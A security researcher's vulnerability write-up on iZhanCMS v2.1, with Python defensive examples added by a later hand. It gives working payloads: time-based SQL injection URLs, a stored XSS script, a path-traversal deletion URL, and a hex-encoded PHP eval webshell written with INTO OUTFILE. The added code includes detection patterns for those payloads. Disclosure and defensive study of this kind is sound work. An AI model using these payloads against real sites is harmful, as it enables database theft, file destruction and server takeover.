v2.1 vulnerability analysis

Posted by barello at 2020-03-01

iZhanCMS (Love Station CMS) is a free, open source content management system that advertises itself as open and flexible, safe and efficient, simple and attractive. This time we performed a code audit of iZhanCMS v2.1 and found several security vulnerabilities in the code.

Official website of izhancms: http://www.izhancms.com

Source code version: iZhanCMS (zend6.0) v2.1

Source code download: http://www.izhancms.com/category/category/index/cid/1

Default admin backend address: http://127.0.0.1/admin/admin/index

Default account and password: admin, with a password of at least six characters chosen during installation

Code analysis:

Vulnerable file: application/index/Controllers/indexcontroller.php, lines 89-102:

The parameter id obtained in this function is not wrapped in single quotes. It is concatenated directly into the SQL statement and executed against the database, so the program contains a SQL injection vulnerability that an attacker can use to obtain sensitive information from the database.

Exploit:

Based on the location of the vulnerability, a time-based blind injection payload is constructed:

http://127.0.0.1/index/index/qrcodepreview?id=2/**/xor/**/if(substring(user(),1,1)='2',sleep(5),0)--

The database contents can also be dumped directly with sqlmap:

Code analysis:

Vulnerable file: application/goods/Controllers/goodscontroller.php, lines 68-96

In this function the obtained parameter id is passed to the getlinkgoodsid function for a query. Note the third circled region in the screenshot, where the parameter id is concatenated into the SQL statement and executed against the database: this is a SQL injection point. Let's follow the getlinkgoodsid function:

Vulnerable file: application/goods/Models/goodsmodel.php, lines 91-109:

The parameter id obtained in this function is likewise concatenated into the SQL statement and executed against the database.

To sum up, the parameter id is concatenated into two SQL statements, which results in a SQL injection vulnerability in the program. An attacker can use it to obtain sensitive information from the database.

Exploit:

Based on the location of the vulnerability, a time-based blind injection payload is constructed:

http://127.0.0.1/goods/Goods/info?id=2 xor if('2'='2',sleep(5),0)--

It can also be run directly through sqlmap:

This one is too simple; the code analysis is skipped.

Exploit:

Site front end - Comments and Suggestions - Commenter field - submit the payload: 222<script>alert(/XSS/)</script>

When the administrator views the message in the admin backend, the JavaScript is executed.

Code analysis:

Vulnerable file 1: admin/application/extensions/Controllers/qrcodecontroller.php

Lines 235-246:

The parameter id obtained in this function is concatenated into the SQL statement and executed against the database; this is a SQL injection point.

Vulnerable file 2: admin/application/webset/Controllers/managerlogcontroller.php

Lines 33-57:

Vulnerable file 3: admin/application/webset/Controllers/adminusercontroller.php

Lines 37-69:

In this function the parameter keyword is likewise concatenated into the SQL statement without any filtering and executed against the database, resulting in a SQL injection vulnerability that an attacker can use to obtain sensitive information from the database.

Essentially all search boxes in the admin backend have the same problem.

Exploit:

Vulnerability location 1: http://127.0.0.1/admin/extensions/qrcode/preview?id=2

It can be run directly through sqlmap:

Location 2: log in to the admin backend - System Settings - Log Management - Search - Keyword

Location 3: log in to the admin backend - Permission Settings - System Administrators - Search - Keyword

The other admin backend search boxes have essentially the same problem, so they are not verified one by one.
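The defensive counterpart of the concatenation described for the front-end id lookups and the admin keyword search above, written as an added example in Python rather than the CMS's PHP (it is not iZhanCMS code); the tables, rows and function names are constructed for the demonstration.

```python
# Added example (not iZhanCMS code): the two input patterns the audit describes,
# an integer id and a free-text search keyword, handled with validation and
# bound parameters instead of string concatenation. The schema is constructed.
import re
import sqlite3

def parse_id(raw: str) -> int:
    """Accept only a plain positive integer for ?id=..., reject anything else."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", raw.strip()):
        raise ValueError(f"invalid id: {raw!r}")
    return int(raw)

def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the goods and admin user tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE goods(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO goods VALUES (1, 'lamp'), (2, 'chair'), (3, 'desk_100%');
        CREATE TABLE admin_user(id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO admin_user VALUES (1, 'admin'), (2, 'editor_a'), (3, 'ops%team');
    """)
    return conn

def goods_info(conn, raw_id: str):
    """Counterpart of goods/Goods/info?id=...: validate, then bind the value."""
    gid = parse_id(raw_id)
    return conn.execute("SELECT id, name FROM goods WHERE id = ?", (gid,)).fetchone()

def escape_like(keyword: str) -> str:
    """Escape LIKE metacharacters so a user keyword is matched literally."""
    return keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def search_admin_users(conn, keyword: str):
    """Counterpart of the admin search box: the keyword is bound, never concatenated."""
    pattern = "%" + escape_like(keyword) + "%"
    rows = conn.execute(
        "SELECT username FROM admin_user WHERE username LIKE ? ESCAPE '\\' ORDER BY id",
        (pattern,),
    ).fetchall()
    return [r[0] for r in rows]
```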

Code analysis:

Vulnerable file: admin/application/webset/Controllers/dbrecovercontroller.php

Follow the deletetable function:

Vulnerable file: admin/application/webset/Models/tablemodel.php

This function reads $save_path, processes it, and then passes $filen_path straight to the delete function, which results in an arbitrary file deletion vulnerability that an attacker can use to delete arbitrary files.

Exploit:

Create test.txt in the root directory as a test file for the vulnerability.

Log in to the admin backend and submit the payload; test.txt in the root directory is deleted.

Payload: http://127.0.0.1/admin/webset/dbrecover/delete?tbname=../../../test.txt
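A containment check for the deletetable pattern above, as an added example in Python rather than the CMS's PHP (not the project's code); the resolve_backup_file and delete_backup functions and the backup directory layout are assumptions made for the demonstration.

```python
# Added example (not iZhanCMS code): a containment check for a "delete backup
# file by table name" handler, the pattern behind dbrecover/delete?tbname=...
# Directory layout and file names below are constructed for the demonstration.
import os
import re
import tempfile

BACKUP_EXT = ".sql"
TABLE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")  # MySQL identifier charset

def resolve_backup_file(base_dir: str, tbname: str) -> str:
    """Map a user-supplied table name to a file inside base_dir, or raise."""
    # First line of defence: the value must look like a table identifier,
    # so "../../../test.txt" is rejected before any path is built.
    if not TABLE_NAME.fullmatch(tbname):
        raise ValueError(f"invalid table name: {tbname!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, tbname + BACKUP_EXT))
    # Second line of defence: the resolved path (symlinks followed) must
    # still sit inside the backup directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes backup directory: {target}")
    return target

def delete_backup(base_dir: str, tbname: str) -> bool:
    """Delete the backup file for tbname; False if there is none."""
    target = resolve_backup_file(base_dir, tbname)
    if not os.path.isfile(target):
        return False
    os.remove(target)
    return True

def demo() -> dict:
    """Constructed scenario: one real backup plus a file outside the directory."""
    root = tempfile.mkdtemp()
    backup_dir = os.path.join(root, "backup")
    os.mkdir(backup_dir)
    open(os.path.join(backup_dir, "goods.sql"), "w").close()
    outside = os.path.join(root, "test.txt")
    open(outside, "w").close()
    result = {"legit_deleted": delete_backup(backup_dir, "goods")}
    try:
        delete_backup(backup_dir, "../test")  # traversal attempt, as in the audit
        result["traversal_rejected"] = False
    except ValueError:
        result["traversal_rejected"] = True
    result["outside_file_survives"] = os.path.exists(outside)
    return result
```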

Method 1: modify the tag library file

Log in to the admin backend - Template Management - Tag Management - Tag List - modify tag.lib.php:

Payload: phpinfo();

Visiting http://127.0.0.1/library/mainone/taglib/tags.lib.php triggers the code execution vulnerability.

Method 2: write a webshell with a SQL statement

Log in to the admin backend - System Settings - Database Operations - SQL Statement - Execute SQL statement.

Problem: the input is HTML-entity encoded, so the traditional INTO OUTFILE statement cannot write the file successfully:

SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE 'C:/www/222aaa.php' (write fails)

Hex-encode the one-line shell instead and construct the payload as follows:

SELECT 111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php' LINES TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E --

The webshell is written successfully, giving control of the web server.
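On the detection side, an added example (not from the original post) that screens access-log request lines for the payload shapes used throughout this audit: the /**/-padded and plain time-based injections against the id parameter and the traversal in tbname; the log lines and rule names are constructed.

```python
# Added example (not iZhanCMS code): a request-line screen for the payload
# shapes in this audit, run over constructed access-log lines. The query string
# is normalised (URL-decoded, lower-cased, /**/ fillers stripped) before
# matching, because the first payload uses /**/ in place of spaces.
import re
from urllib.parse import unquote_plus

RULES = {
    # time-based blind SQL injection: sleep()/benchmark() inside a parameter
    "sqli_time_blind": re.compile(r"\b(sleep|benchmark)\s*\("),
    # logic operator wrapped around a conditional, as in ?id=2 xor if(...)
    "sqli_logic": re.compile(r"\b(xor|or|and)\s+if\s*\("),
    # directory traversal, as in dbrecover/delete?tbname=../../../test.txt
    "path_traversal": re.compile(r"\.\.[/\\]"),
}

def normalise(query: str) -> str:
    """Undo the encodings an attacker uses to hide the payload from naive matching."""
    q = unquote_plus(unquote_plus(query))  # twice: payloads are often double-encoded
    q = re.sub(r"/\*.*?\*/", " ", q)       # /**/ comment fillers become whitespace
    return q.lower()

def classify_request(line: str) -> list:
    """Return the rule names that fire on one access-log line (empty if clean)."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
    if not m:
        return []
    _path, _, query = m.group(1).partition("?")
    text = normalise(query)
    return [name for name, rx in RULES.items() if rx.search(text)]

SAMPLE_LOG = [  # constructed, not real traffic
    '10.0.0.5 - - [01/Mar/2020:10:00:01 +0800] "GET /index/index/qrcodepreview?id=2/**/xor/**/if(substring(user(),1,1)=%272%27,sleep(5),0)-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Mar/2020:10:00:09 +0800] "GET /goods/Goods/info?id=2 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Mar/2020:10:00:15 +0800] "GET /admin/webset/dbrecover/delete?tbname=../../../test.txt HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Mar/2020:10:00:21 +0800] "GET /goods/Goods/info?id=2+xor+if(%272%27=%272%27,sleep(5),0)-- HTTP/1.1" 200 2048',
]

def scan(lines) -> dict:
    """Line index -> fired rules, for every line that matched at least one rule."""
    report = {}
    for i, line in enumerate(lines):
        hits = classify_request(line)
        if hits:
            report[i] = hits
    return report
```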

This was a fairly comprehensive case combining black-box and white-box testing. Anyone researching this area is welcome to discuss and exchange ideas.
